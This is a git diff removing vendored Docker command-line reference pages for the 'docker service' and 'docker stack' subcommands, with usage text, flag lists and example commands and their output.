[text/template](http://golange.org/pkg/text/template/) package. - -The supported flags are the following : - -- `--hostname` -- `--mount` -- `--env` - -Valid placeholders for the Go template are listed below: - -Placeholder | Description ------------------ | -------------------------------------------- -`.Service.ID` | Service ID -`.Service.Name` | Service name -`.Service.Labels` | Service labels -`.Node.ID` | Node ID -`.Task.ID` | Task ID -`.Task.Name` | Task name -`.Task.Slot` | Task slot - -#### Template example - -In this example, we are going to set the template of the created containers based on the -service's name and the node's ID where it sits. - -```bash -$ docker service create --name hosttempl --hostname={% raw %}"{{.Node.ID}}-{{.Service.Name}}"{% endraw %} busybox top -va8ew30grofhjoychbr6iot8c - -$ docker service ps va8ew30grofhjoychbr6iot8c -ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS -wo41w8hg8qan hosttempl.1 busybox:latest@sha256:29f5d56d12684887bdfa50dcd29fc31eea4aaf4ad3bec43daf19026a7ce69912 2e7a8a9c4da2 Running Running about a minute ago - -$ docker inspect --format={% raw %}"{{.Config.Hostname}}"{% endraw %} hosttempl.1.wo41w8hg8qanxwjwsg4kxpprj -x3ti0erg11rjpg64m75kej2mz-hosttempl -``` - -## Related information - -* [service inspect](service_inspect.md) -* [service logs](service_logs.md) -* [service ls](service_ls.md) -* [service rm](service_rm.md) -* [service scale](service_scale.md) -* [service ps](service_ps.md) -* [service update](service_update.md) - - diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_inspect.md deleted file mode 100644 index 8b4ab62d89..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/service_inspect.md +++ /dev/null @@ -1,162 +0,0 @@ ---- -title: "service inspect" -description: "The service inspect command description and usage" -keywords: "service, inspect" ---- - - - -# service inspect - -```Markdown -Usage: docker service inspect [OPTIONS] SERVICE [SERVICE...] - -Display detailed information on one or more services - -Options: - -f, --format string Format the output using the given Go template - --help Print usage - --pretty Print the information in a human friendly format. -``` - - -Inspects the specified service. This command has to be run targeting a manager -node. - -By default, this renders all results in a JSON array. If a format is specified, -the given template will be executed for each result. - -Go's [text/template](http://golang.org/pkg/text/template/) package -describes all the details of the format. - -## Examples - -### Inspecting a service by name or ID - -You can inspect a service, either by its *name*, or *ID* - -For example, given the following service; - -```bash -$ docker service ls -ID NAME MODE REPLICAS IMAGE -dmu1ept4cxcf redis replicated 3/3 redis:3.0.6 -``` - -Both `docker service inspect redis`, and `docker service inspect dmu1ept4cxcf` -produce the same result: - -```bash -$ docker service inspect redis -[ - { - "ID": "dmu1ept4cxcfe8k8lhtux3ro3", - "Version": { - "Index": 12 - }, - "CreatedAt": "2016-06-17T18:44:02.558012087Z", - "UpdatedAt": "2016-06-17T18:44:02.558012087Z", - "Spec": { - "Name": "redis", - "TaskTemplate": { - "ContainerSpec": { - "Image": "redis:3.0.6" - }, - "Resources": { - "Limits": {}, - "Reservations": {} - }, - "RestartPolicy": { - "Condition": "any", - "MaxAttempts": 0 - }, - "Placement": {} - }, - "Mode": { - "Replicated": { - "Replicas": 1 - } - }, - "UpdateConfig": {}, - "EndpointSpec": { - "Mode": "vip" - } - }, - "Endpoint": { - "Spec": {} - } - } -] -``` - -```bash -$ docker service inspect dmu1ept4cxcf -[ - { - "ID": "dmu1ept4cxcfe8k8lhtux3ro3", - "Version": { - "Index": 12 - }, - ... - } -] -``` - -### Inspect a service using pretty-print - -You can print the inspect output in a human-readable format instead of the default -JSON output, by using the `--pretty` option: - -```bash -$ docker service inspect --pretty frontend -ID: c8wgl7q4ndfd52ni6qftkvnnp -Name: frontend -Labels: - - org.example.projectname=demo-app -Service Mode: REPLICATED - Replicas: 5 -Placement: -UpdateConfig: - Parallelism: 0 -ContainerSpec: - Image: nginx:alpine -Resources: -Endpoint Mode: vip -Ports: - Name = - Protocol = tcp - TargetPort = 443 - PublishedPort = 4443 -``` - -You can also use `--format pretty` for the same effect. - - -### Finding the number of tasks running as part of a service - -The `--format` option can be used to obtain specific information about a -service. For example, the following command outputs the number of replicas -of the "redis" service. - -```bash{% raw %} -$ docker service inspect --format='{{.Spec.Mode.Replicated.Replicas}}' redis -10 -{% endraw %}``` - - -## Related information - -* [service create](service_create.md) -* [service logs](service_logs.md) -* [service ls](service_ls.md) -* [service rm](service_rm.md) -* [service scale](service_scale.md) -* [service ps](service_ps.md) -* [service update](service_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_logs.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_logs.md deleted file mode 100644 index fdf6a3a245..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/service_logs.md +++ /dev/null @@ -1,77 +0,0 @@ ---- -title: "service logs (experimental)" -description: "The service logs command description and usage" -keywords: "service, logs" -advisory: "experimental" ---- - - - -# service logs - -```Markdown -Usage: docker service logs [OPTIONS] SERVICE - -Fetch the logs of a service - -Options: - --details Show extra details provided to logs - -f, --follow Follow log output - --help Print usage - --since string Show logs since timestamp - --tail string Number of lines to show from the end of the logs (default "all") - -t, --timestamps Show timestamps -``` - -The `docker service logs` command batch-retrieves logs present at the time of execution. - -> **Note**: this command is only functional for services that are started with -> the `json-file` or `journald` logging driver. - -For more information about selecting and configuring logging drivers, refer to -[Configure logging drivers](https://docs.docker.com/engine/admin/logging/overview/). - -The `docker service logs --follow` command will continue streaming the new output from -the service's `STDOUT` and `STDERR`. - -Passing a negative number or a non-integer to `--tail` is invalid and the -value is set to `all` in that case. - -The `docker service logs --timestamps` command will add an [RFC3339Nano timestamp](https://golang.org/pkg/time/#pkg-constants) -, for example `2014-09-16T06:17:46.000000000Z`, to each -log entry. To ensure that the timestamps are aligned the -nano-second part of the timestamp will be padded with zero when necessary. - -The `docker service logs --details` command will add on extra attributes, such as -environment variables and labels, provided to `--log-opt` when creating the -service. - -The `--since` option shows only the service logs generated after -a given date. You can specify the date as an RFC 3339 date, a UNIX -timestamp, or a Go duration string (e.g. `1m30s`, `3h`). Besides RFC3339 date -format you may also use RFC3339Nano, `2006-01-02T15:04:05`, -`2006-01-02T15:04:05.999999999`, `2006-01-02Z07:00`, and `2006-01-02`. The local -timezone on the client will be used if you do not provide either a `Z` or a -`+-00:00` timezone offset at the end of the timestamp. When providing Unix -timestamps enter seconds[.nanoseconds], where seconds is the number of seconds -that have elapsed since January 1, 1970 (midnight UTC/GMT), not counting leap -seconds (aka Unix epoch or Unix time), and the optional .nanoseconds field is a -fraction of a second no more than nine digits long. You can combine the -`--since` option with either or both of the `--follow` or `--tail` options. - -## Related information - -* [service create](service_create.md) -* [service inspect](service_inspect.md) -* [service ls](service_ls.md) -* [service rm](service_rm.md) -* [service scale](service_scale.md) -* [service ps](service_ps.md) -* [service update](service_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_ls.md deleted file mode 100644 index ccd68af750..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/service_ls.md +++ /dev/null @@ -1,114 +0,0 @@ ---- -title: "service ls" -description: "The service ls command description and usage" -keywords: "service, ls" ---- - - - -# service ls - -```Markdown -Usage: docker service ls [OPTIONS] - -List services - -Aliases: - ls, list - -Options: - -f, --filter value Filter output based on conditions provided - --help Print usage - -q, --quiet Only display IDs -``` - -This command when run targeting a manager, lists services are running in the -swarm. - -On a manager node: -```bash -$ docker service ls -ID NAME MODE REPLICAS IMAGE -c8wgl7q4ndfd frontend replicated 5/5 nginx:alpine -dmu1ept4cxcf redis replicated 3/3 redis:3.0.6 -iwe3278osahj mongo global 7/7 mongo:3.3 -``` - -The `REPLICAS` column shows both the *actual* and *desired* number of tasks for -the service. - -## Filtering - -The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more -than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`) - -The currently supported filters are: - -* [id](service_ls.md#id) -* [label](service_ls.md#label) -* [name](service_ls.md#name) - -#### ID - -The `id` filter matches all or part of a service's id. - -```bash -$ docker service ls -f "id=0bcjw" -ID NAME MODE REPLICAS IMAGE -0bcjwfh8ychr redis replicated 1/1 redis:3.0.6 -``` - -#### Label - -The `label` filter matches services based on the presence of a `label` alone or -a `label` and a value. - -The following filter matches all services with a `project` label regardless of -its value: - -```bash -$ docker service ls --filter label=project -ID NAME MODE REPLICAS IMAGE -01sl1rp6nj5u frontend2 replicated 1/1 nginx:alpine -36xvvwwauej0 frontend replicated 5/5 nginx:alpine -74nzcxxjv6fq backend replicated 3/3 redis:3.0.6 -``` - -The following filter matches only services with the `project` label with the -`project-a` value. - -```bash -$ docker service ls --filter label=project=project-a -ID NAME MODE REPLICAS IMAGE -36xvvwwauej0 frontend replicated 5/5 nginx:alpine -74nzcxxjv6fq backend replicated 3/3 redis:3.0.6 -``` - -#### Name - -The `name` filter matches on all or part of a service's name. - -The following filter matches services with a name containing `redis`. - -```bash -$ docker service ls --filter name=redis -ID NAME MODE REPLICAS IMAGE -0bcjwfh8ychr redis replicated 1/1 redis:3.0.6 -``` - -## Related information - -* [service create](service_create.md) -* [service inspect](service_inspect.md) -* [service logs](service_logs.md) -* [service rm](service_rm.md) -* [service scale](service_scale.md) -* [service ps](service_ps.md) -* [service update](service_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_ps.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_ps.md deleted file mode 100644 index 61abb15f67..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/service_ps.md +++ /dev/null @@ -1,161 +0,0 @@ ---- -title: "service ps" -description: "The service ps command description and usage" -keywords: "service, tasks, ps" -aliases: ["/engine/reference/commandline/service_tasks/"] ---- - - - -# service ps - -```Markdown -Usage: docker service ps [OPTIONS] SERVICE - -List the tasks of a service - -Options: - -f, --filter filter Filter output based on conditions provided - --help Print usage - --no-resolve Do not map IDs to Names - --no-trunc Do not truncate output - -q, --quiet Only display task IDs -``` - -Lists the tasks that are running as part of the specified service. This command -has to be run targeting a manager node. - -## Examples - -### Listing the tasks that are part of a service - -The following command shows all the tasks that are part of the `redis` service: - -```bash -$ docker service ps redis - -ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS -0qihejybwf1x redis.1 redis:3.0.5 manager1 Running Running 8 seconds -bk658fpbex0d redis.2 redis:3.0.5 worker2 Running Running 9 seconds -5ls5s5fldaqg redis.3 redis:3.0.5 worker1 Running Running 9 seconds -8ryt076polmc redis.4 redis:3.0.5 worker1 Running Running 9 seconds -1x0v8yomsncd redis.5 redis:3.0.5 manager1 Running Running 8 seconds -71v7je3el7rr redis.6 redis:3.0.5 worker2 Running Running 9 seconds -4l3zm9b7tfr7 redis.7 redis:3.0.5 worker2 Running Running 9 seconds -9tfpyixiy2i7 redis.8 redis:3.0.5 worker1 Running Running 9 seconds -3w1wu13yupln redis.9 redis:3.0.5 manager1 Running Running 8 seconds -8eaxrb2fqpbn redis.10 redis:3.0.5 manager1 Running Running 8 seconds -``` - -In addition to _running_ tasks, the output also shows the task history. For -example, after updating the service to use the `redis:3.0.6` image, the output -may look like this: - -```bash -$ docker service ps redis - -ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS -50qe8lfnxaxk redis.1 redis:3.0.6 manager1 Running Running 6 seconds ago -ky2re9oz86r9 \_ redis.1 redis:3.0.5 manager1 Shutdown Shutdown 8 seconds ago -3s46te2nzl4i redis.2 redis:3.0.6 worker2 Running Running less than a second ago -nvjljf7rmor4 \_ redis.2 redis:3.0.6 worker2 Shutdown Rejected 23 seconds ago "No such image: redis@sha256:6…" -vtiuz2fpc0yb \_ redis.2 redis:3.0.5 worker2 Shutdown Shutdown 1 second ago -jnarweeha8x4 redis.3 redis:3.0.6 worker1 Running Running 3 seconds ago -vs448yca2nz4 \_ redis.3 redis:3.0.5 worker1 Shutdown Shutdown 4 seconds ago -jf1i992619ir redis.4 redis:3.0.6 worker1 Running Running 10 seconds ago -blkttv7zs8ee \_ redis.4 redis:3.0.5 worker1 Shutdown Shutdown 11 seconds ago -``` - -The number of items in the task history is determined by the -`--task-history-limit` option that was set when initializing the swarm. You can -change the task history retention limit using the -[`docker swarm update`](swarm_update.md) command. - -When deploying a service, docker resolves the digest for the service's -image, and pins the service to that digest. The digest is not shown by -default, but is printed if `--no-trunc` is used. The `--no-trunc` option -also shows the non-truncated task ID, and error-messages, as can be seen below; - -```bash -$ docker service ps --no-trunc redis - -ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS -50qe8lfnxaxksi9w2a704wkp7 redis.1 redis:3.0.6@sha256:6a692a76c2081888b589e26e6ec835743119fe453d67ecf03df7de5b73d69842 manager1 Running Running 5 minutes ago -ky2re9oz86r9556i2szb8a8af \_ redis.1 redis:3.0.5@sha256:f8829e00d95672c48c60f468329d6693c4bdd28d1f057e755f8ba8b40008682e worker2 Shutdown Shutdown 5 minutes ago -bk658fpbex0d57cqcwoe3jthu redis.2 redis:3.0.6@sha256:6a692a76c2081888b589e26e6ec835743119fe453d67ecf03df7de5b73d69842 worker2 Running Running 5 seconds -nvjljf7rmor4htv7l8rwcx7i7 \_ redis.2 redis:3.0.6@sha256:6a692a76c2081888b589e26e6ec835743119fe453d67ecf03df7de5b73d69842 worker2 Shutdown Rejected 5 minutes ago "No such image: redis@sha256:6a692a76c2081888b589e26e6ec835743119fe453d67ecf03df7de5b73d69842" -``` - -## Filtering - -The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there -is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`). -Multiple filter flags are combined as an `OR` filter. For example, -`-f name=redis.1 -f name=redis.7` returns both `redis.1` and `redis.7` tasks. - -The currently supported filters are: - -* [id](#id) -* [name](#name) -* [node](#node) -* [desired-state](#desired-state) - - -#### ID - -The `id` filter matches on all or a prefix of a task's ID. - -```bash -$ docker service ps -f "id=8" redis - -ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS -8ryt076polmc redis.4 redis:3.0.6 worker1 Running Running 9 seconds -8eaxrb2fqpbn redis.10 redis:3.0.6 manager1 Running Running 8 seconds -``` - -#### Name - -The `name` filter matches on task names. - -```bash -$ docker service ps -f "name=redis.1" redis -ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS -qihejybwf1x5 redis.1 redis:3.0.6 manager1 Running Running 8 seconds -``` - - -#### Node - -The `node` filter matches on a node name or a node ID. - -```bash -$ docker service ps -f "node=manager1" redis -ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS -0qihejybwf1x redis.1 redis:3.0.6 manager1 Running Running 8 seconds -1x0v8yomsncd redis.5 redis:3.0.6 manager1 Running Running 8 seconds -3w1wu13yupln redis.9 redis:3.0.6 manager1 Running Running 8 seconds -8eaxrb2fqpbn redis.10 redis:3.0.6 manager1 Running Running 8 seconds -``` - - -#### desired-state - -The `desired-state` filter can take the values `running`, `shutdown`, and `accepted`. - - -## Related information - -* [service create](service_create.md) -* [service inspect](service_inspect.md) -* [service logs](service_logs.md) -* [service ls](service_ls.md) -* [service rm](service_rm.md) -* [service scale](service_scale.md) -* [service update](service_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_rm.md deleted file mode 100644 index d0ba90b26d..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/service_rm.md +++ /dev/null @@ -1,55 +0,0 @@ ---- -title: "service rm" -description: "The service rm command description and usage" -keywords: "service, rm" ---- - - - -# service rm - -```Markdown -Usage: docker service rm SERVICE [SERVICE...] - -Remove one or more services - -Aliases: - rm, remove - -Options: - --help Print usage -``` - -Removes the specified services from the swarm. This command has to be run -targeting a manager node. - -For example, to remove the redis service: - -```bash -$ docker service rm redis -redis -$ docker service ls -ID NAME MODE REPLICAS IMAGE -``` - -> **Warning**: Unlike `docker rm`, this command does not ask for confirmation -> before removing a running service. - - - -## Related information - -* [service create](service_create.md) -* [service inspect](service_inspect.md) -* [service logs](service_logs.md) -* [service ls](service_ls.md) -* [service scale](service_scale.md) -* [service ps](service_ps.md) -* [service update](service_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_scale.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_scale.md deleted file mode 100644 index 64075ed092..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/service_scale.md +++ /dev/null @@ -1,96 +0,0 @@ ---- -title: "service scale" -description: "The service scale command description and usage" -keywords: "service, scale" ---- - - - -# service scale - -```markdown -Usage: docker service scale SERVICE=REPLICAS [SERVICE=REPLICAS...] - -Scale one or multiple replicated services - -Options: - --help Print usage -``` - -## Examples - -### Scale a service - -The scale command enables you to scale one or more replicated services either up -or down to the desired number of replicas. This command cannot be applied on -services which are global mode. The command will return immediately, but the -actual scaling of the service may take some time. To stop all replicas of a -service while keeping the service active in the swarm you can set the scale to 0. - -For example, the following command scales the "frontend" service to 50 tasks. - -```bash -$ docker service scale frontend=50 -frontend scaled to 50 -``` - -The following command tries to scale a global service to 10 tasks and returns an error. - -``` -$ docker service create --mode global --name backend backend:latest -b4g08uwuairexjub6ome6usqh -$ docker service scale backend=10 -backend: scale can only be used with replicated mode -``` - -Directly afterwards, run `docker service ls`, to see the actual number of -replicas. - -```bash -$ docker service ls --filter name=frontend - -ID NAME MODE REPLICAS IMAGE -3pr5mlvu3fh9 frontend replicated 15/50 nginx:alpine -``` - -You can also scale a service using the [`docker service update`](service_update.md) -command. The following commands are equivalent: - -```bash -$ docker service scale frontend=50 -$ docker service update --replicas=50 frontend -``` - -### Scale multiple services - -The `docker service scale` command allows you to set the desired number of -tasks for multiple services at once. The following example scales both the -backend and frontend services: - -```bash -$ docker service scale backend=3 frontend=5 -backend scaled to 3 -frontend scaled to 5 - -$ docker service ls -ID NAME MODE REPLICAS IMAGE -3pr5mlvu3fh9 frontend replicated 5/5 nginx:alpine -74nzcxxjv6fq backend replicated 3/3 redis:3.0.6 -``` - -## Related information - -* [service create](service_create.md) -* [service inspect](service_inspect.md) -* [service logs](service_logs.md) -* [service ls](service_ls.md) -* [service rm](service_rm.md) -* [service ps](service_ps.md) -* [service update](service_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_update.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_update.md deleted file mode 100644 index 301a0eabe8..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/service_update.md +++ /dev/null @@ -1,181 +0,0 @@ ---- -title: "service update" -description: "The service update command description and usage" -keywords: "service, update" ---- - - - -# service update - -```Markdown -Usage: docker service update [OPTIONS] SERVICE - -Update a service - -Options: - --args string Service command args - --constraint-add list Add or update a placement constraint (default []) - --constraint-rm list Remove a constraint (default []) - --container-label-add list Add or update a container label (default []) - --container-label-rm list Remove a container label by its key (default []) - --dns-add list Add or update a custom DNS server (default []) - --dns-option-add list Add or update a DNS option (default []) - --dns-option-rm list Remove a DNS option (default []) - --dns-rm list Remove a custom DNS server (default []) - --dns-search-add list Add or update a custom DNS search domain (default []) - --dns-search-rm list Remove a DNS search domain (default []) - --endpoint-mode string Endpoint mode (vip or dnsrr) - --env-add list Add or update an environment variable (default []) - --env-rm list Remove an environment variable (default []) - --force Force update even if no changes require it - --group-add list Add an additional supplementary user group to the container (default []) - --group-rm list Remove a previously added supplementary user group from the container (default []) - --health-cmd string Command to run to check health - --health-interval duration Time between running the check (ns|us|ms|s|m|h) - --health-retries int Consecutive failures needed to report unhealthy - --health-timeout duration Maximum time to allow one check to run (ns|us|ms|s|m|h) - --help Print usage - --host-add list Add or update a custom host-to-IP mapping (host:ip) (default []) - --host-rm list Remove a custom host-to-IP mapping (host:ip) (default []) - --hostname string Container hostname - --image string Service image tag - --label-add list Add or update a service label (default []) - --label-rm list Remove a label by its key (default []) - --limit-cpu decimal Limit CPUs (default 0.000) - --limit-memory bytes Limit Memory (default 0 B) - --log-driver string Logging driver for service - --log-opt list Logging driver options (default []) - --mount-add mount Add or update a mount on a service - --mount-rm list Remove a mount by its target path (default []) - --no-healthcheck Disable any container-specified HEALTHCHECK - --publish-add port Add or update a published port - --publish-rm port Remove a published port by its target port - --replicas uint Number of tasks - --reserve-cpu decimal Reserve CPUs (default 0.000) - --reserve-memory bytes Reserve Memory (default 0 B) - --restart-condition string Restart when condition is met (none, on-failure, or any) - --restart-delay duration Delay between restart attempts (ns|us|ms|s|m|h) - --restart-max-attempts uint Maximum number of restarts before giving up - --restart-window duration Window used to evaluate the restart policy (ns|us|ms|s|m|h) - --rollback Rollback to previous specification - --secret-add secret Add or update a secret on a service - --secret-rm list Remove a secret (default []) - --stop-grace-period duration Time to wait before force killing a container (ns|us|ms|s|m|h) - -t, --tty Allocate a pseudo-TTY - --update-delay duration Delay between updates (ns|us|ms|s|m|h) (default 0s) - --update-failure-action string Action on update failure (pause|continue) (default "pause") - --update-max-failure-ratio float Failure rate to tolerate during an update - --update-monitor duration Duration after each task update to monitor for failure (ns|us|ms|s|m|h) (default 0s) - --update-parallelism uint Maximum number of tasks updated simultaneously (0 to update all at once) (default 1) - -u, --user string Username or UID (format: [:]) - --with-registry-auth Send registry authentication details to swarm agents - -w, --workdir string Working directory inside the container -``` - -Updates a service as described by the specified parameters. This command has to be run targeting a manager node. -The parameters are the same as [`docker service create`](service_create.md). Please look at the description there -for further information. - -Normally, updating a service will only cause the service's tasks to be replaced with new ones if a change to the -service requires recreating the tasks for it to take effect. For example, only changing the -`--update-parallelism` setting will not recreate the tasks, because the individual tasks are not affected by this -setting. However, the `--force` flag will cause the tasks to be recreated anyway. This can be used to perform a -rolling restart without any changes to the service parameters. - -## Examples - -### Update a service - -```bash -$ docker service update --limit-cpu 2 redis -``` - -### Perform a rolling restart with no parameter changes - -```bash -$ docker service update --force --update-parallelism 1 --update-delay 30s redis -``` - -In this example, the `--force` flag causes the service's tasks to be shut down -and replaced with new ones even though none of the other parameters would -normally cause that to happen. The `--update-parallelism 1` setting ensures -that only one task is replaced at a time (this is the default behavior). The -`--update-delay 30s` setting introduces a 30 second delay between tasks, so -that the rolling restart happens gradually. - -### Adding and removing mounts - -Use the `--mount-add` or `--mount-rm` options add or remove a service's bind-mounts -or volumes. - -The following example creates a service which mounts the `test-data` volume to -`/somewhere`. The next step updates the service to also mount the `other-volume` -volume to `/somewhere-else`volume, The last step unmounts the `/somewhere` mount -point, effectively removing the `test-data` volume. Each command returns the -service name. - -- The `--mount-add` flag takes the same parameters as the `--mount` flag on - `service create`. Refer to the [volumes and - bind-mounts](service_create.md#volumes-and-bind-mounts-mount) section in the - `service create` reference for details. - -- The `--mount-rm` flag takes the `target` path of the mount. - -```bash -$ docker service create \ - --name=myservice \ - --mount \ - type=volume,source=test-data,target=/somewhere \ - nginx:alpine \ - myservice - -myservice - -$ docker service update \ - --mount-add \ - type=volume,source=other-volume,target=/somewhere-else \ - myservice - -myservice - -$ docker service update --mount-rm /somewhere myservice - -myservice -``` - -### Adding and removing secrets - -Use the `--secret-add` or `--secret-rm` options add or remove a service's -secrets. - -The following example adds a secret named `ssh-2` and removes `ssh-1`: - -```bash -$ docker service update \ - --secret-add source=ssh-2,target=ssh-2 \ - --secret-rm ssh-1 \ - myservice -``` - -### Update services using templates - -Some flags of `service update` support the use of templating. -See [`service create`](./service_create.md#templating) for the reference. - -## Related information - -* [service create](service_create.md) -* [service inspect](service_inspect.md) -* [service logs](service_logs.md) -* [service ls](service_ls.md) -* [service ps](service_ps.md) -* [service rm](service_rm.md) -* [service scale](service_scale.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_deploy.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_deploy.md deleted file mode 100644 index 037feaebd7..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/stack_deploy.md +++ /dev/null @@ -1,98 +0,0 @@ ---- -title: "stack deploy" -description: "The stack deploy command description and usage" -keywords: "stack, deploy, up" ---- - - - -# stack deploy - -```markdown -Usage: docker stack deploy [OPTIONS] STACK - -Deploy a new stack or update an existing stack - -Aliases: - deploy, up - -Options: - --bundle-file string Path to a Distributed Application Bundle file - -c, --compose-file string Path to a Compose file - --help Print usage - --with-registry-auth Send registry authentication details to Swarm agents -``` - -Create and update a stack from a `compose` or a `dab` file on the swarm. This command -has to be run targeting a manager node. - -## Compose file - -The `deploy` command supports compose file version `3.0` and above." - -```bash -$ docker stack deploy --compose-file docker-compose.yml vossibility -Ignoring unsupported options: links - -Creating network vossibility_vossibility -Creating network vossibility_default -Creating service vossibility_nsqd -Creating service vossibility_logstash -Creating service vossibility_elasticsearch -Creating service vossibility_kibana -Creating service vossibility_ghollector -Creating service vossibility_lookupd -``` - -You can verify that the services were correctly created - -``` -$ docker service ls -ID NAME MODE REPLICAS IMAGE -29bv0vnlm903 vossibility_lookupd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 -4awt47624qwh vossibility_nsqd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 -4tjx9biia6fs vossibility_elasticsearch replicated 1/1 elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa -7563uuzr9eys vossibility_kibana replicated 1/1 kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03 -9gc5m4met4he vossibility_logstash replicated 1/1 logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe -axqh55ipl40h vossibility_vossibility-collector replicated 1/1 icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba -``` - -## DAB file - -```bash -$ docker stack deploy --bundle-file vossibility-stack.dab vossibility -Loading bundle from vossibility-stack.dab -Creating service vossibility_elasticsearch -Creating service vossibility_kibana -Creating service vossibility_logstash -Creating service vossibility_lookupd -Creating service vossibility_nsqd -Creating service vossibility_vossibility-collector -``` - -You can verify that the services were correctly created: - -```bash -$ docker service ls -ID NAME MODE REPLICAS IMAGE -29bv0vnlm903 vossibility_lookupd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 -4awt47624qwh vossibility_nsqd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 -4tjx9biia6fs vossibility_elasticsearch replicated 1/1 elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa -7563uuzr9eys vossibility_kibana replicated 1/1 kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03 -9gc5m4met4he vossibility_logstash replicated 1/1 logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe -axqh55ipl40h vossibility_vossibility-collector replicated 1/1 icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba -``` - -## Related information - -* [stack ls](stack_ls.md) -* [stack ps](stack_ps.md) -* [stack rm](stack_rm.md) -* [stack services](stack_services.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_ls.md deleted file mode 100644 index 05c7215492..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/stack_ls.md +++ /dev/null @@ -1,47 +0,0 @@ ---- -title: "stack ls" -description: "The stack ls command description and usage" -keywords: "stack, ls" ---- - - - -# stack ls - -```markdown -Usage: docker stack ls - -List stacks - -Aliases: - ls, list - -Options: - --help Print usage -``` - -Lists the stacks. - -For example, the following command shows all stacks and some additional information: - -```bash -$ docker stack ls - -ID SERVICES -vossibility-stack 6 -myapp 2 -``` - -## Related information - -* [stack deploy](stack_deploy.md) -* [stack ps](stack_ps.md) -* [stack rm](stack_rm.md) -* [stack services](stack_services.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_ps.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_ps.md deleted file mode 100644 index 101e9feb11..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/stack_ps.md +++ /dev/null @@ -1,51 +0,0 @@ ---- -title: "stack ps" -description: "The stack ps command description and usage" -keywords: "stack, ps" ---- - - - -# stack ps - -```markdown -Usage: docker stack ps [OPTIONS] STACK - -List the tasks in the stack - -Options: - -f, --filter filter Filter output based on conditions provided - --help Print usage - --no-resolve Do not map IDs to Names - --no-trunc Do not truncate output -``` - -Lists the tasks that are running as part of the specified stack. This -command has to be run targeting a manager node. - -## Filtering - -The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there -is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`). -Multiple filter flags are combined as an `OR` filter. For example, -`-f name=redis.1 -f name=redis.7` returns both `redis.1` and `redis.7` tasks. - -The currently supported filters are: - -* id -* name -* desired-state - -## Related information - -* [stack deploy](stack_deploy.md) -* [stack ls](stack_ls.md) -* [stack rm](stack_rm.md) -* [stack services](stack_services.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_rm.md deleted file mode 100644 index fd639978ec..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/stack_rm.md +++ /dev/null @@ -1,38 +0,0 @@ ---- -title: "stack rm" -description: "The stack rm command description and usage" -keywords: "stack, rm, remove, down" ---- - - - -# stack rm - -```markdown -Usage: docker stack rm STACK - -Remove the stack - -Aliases: - rm, remove, down - -Options: - --help Print usage 